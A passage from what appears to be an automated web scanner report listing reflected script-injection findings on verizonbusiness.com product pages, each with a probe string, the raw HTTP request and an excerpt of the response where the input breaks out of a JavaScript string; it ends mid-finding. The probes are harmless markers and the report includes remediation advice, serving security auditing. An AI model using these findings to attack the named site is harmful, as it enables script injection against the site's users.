The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21a05"%3b345f00ec30e was submitted in the REST URL parameter 1. This input was echoed as 21a05";345f00ec30e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products21a05"%3b345f00ec30e/mobility/management/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products21a05";345f00ec30e/mobility/management/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.184. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4a94'%3bca42588ec38 was submitted in the REST URL parameter 1. This input was echoed as d4a94';ca42588ec38 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsd4a94'%3bca42588ec38/mobility/management/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Productsd4a94';ca42588ec38/mobility/management/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.185. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf5eb'%3b1c04e180630 was submitted in the REST URL parameter 2. This input was echoed as cf5eb';1c04e180630 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobilitycf5eb'%3b1c04e180630/management/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42339
Date: Wed, 17 Nov 2010 00:47:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobilitycf5eb';1c04e180630/management/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.186. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3efa5"%3bd4d61987db9 was submitted in the REST URL parameter 2. This input was echoed as 3efa5";d4d61987db9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility3efa5"%3bd4d61987db9/management/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:46:55 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:46:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility3efa5";d4d61987db9/management/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.187. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 334a6"%3b52979b5fb99 was submitted in the REST URL parameter 3. This input was echoed as 334a6";52979b5fb99 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/management334a6"%3b52979b5fb99/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:23 GMT
Content-Type: text/html
Content-Length: 42514
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/management334a6";52979b5fb99/managed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.188. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ddb5'%3b3f9e4fe4705 was submitted in the REST URL parameter 3. This input was echoed as 2ddb5';3f9e4fe4705 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/management2ddb5'%3b3f9e4fe4705/managed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42514
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/management2ddb5';3f9e4fe4705/managed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.189. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1fb4'%3b77449c5d1be was submitted in the REST URL parameter 4. This input was echoed as a1fb4';77449c5d1be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/management/manageda1fb4'%3b77449c5d1be/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:53 GMT
Content-Type: text/html
Content-Length: 43969
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/management/manageda1fb4';77449c5d1be/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.190. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/management/managed/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daf07"%3baed0622e4f8 was submitted in the REST URL parameter 4. This input was echoed as daf07";aed0622e4f8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/management/manageddaf07"%3baed0622e4f8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43967
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility/management/manageddaf07";aed0622e4f8/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.191. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-email/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8dc5b"%3babb8ad5366a was submitted in the REST URL parameter 1. This input was echoed as 8dc5b";abb8ad5366a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products8dc5b"%3babb8ad5366a/mobility/mobile-email/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:46:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Date: Wed, 17 Nov 2010 00:46:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:46:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products8dc5b";abb8ad5366a/mobility/mobile-email/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.192. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-email/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83558'%3b7fb3163b374 was submitted in the REST URL parameter 1. This input was echoed as 83558';7fb3163b374 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products83558'%3b7fb3163b374/mobility/mobile-email/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Date: Wed, 17 Nov 2010 00:47:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products83558';7fb3163b374/mobility/mobile-email/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.193. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-email/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38154"%3ba3a0ea05a9f was submitted in the REST URL parameter 2. This input was echoed as 38154";a3a0ea05a9f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility38154"%3ba3a0ea05a9f/mobile-email/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:47:30 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42325
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:47:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:47:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/mobility38154";a3a0ea05a9f/mobile-email/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.194. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-email/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73370'%3b4d6d8bcdd9d was submitted in the REST URL parameter 2. This input was echoed as 73370';4d6d8bcdd9d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility73370'%3b4d6d8bcdd9d/mobile-email/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:48:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42325
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:48:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:48:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility73370';4d6d8bcdd9d/mobile-email/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.195. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/mobility/mobile-email/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad694'%3b33a83ce02e9 was submitted in the REST URL parameter 3. This input was echoed as ad694';33a83ce02e9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/mobility/mobile-emailad694'%3b33a83ce02e9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:49:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:49:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:49:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/mobility/mobile-emailad694';33a83ce02e9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.196. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
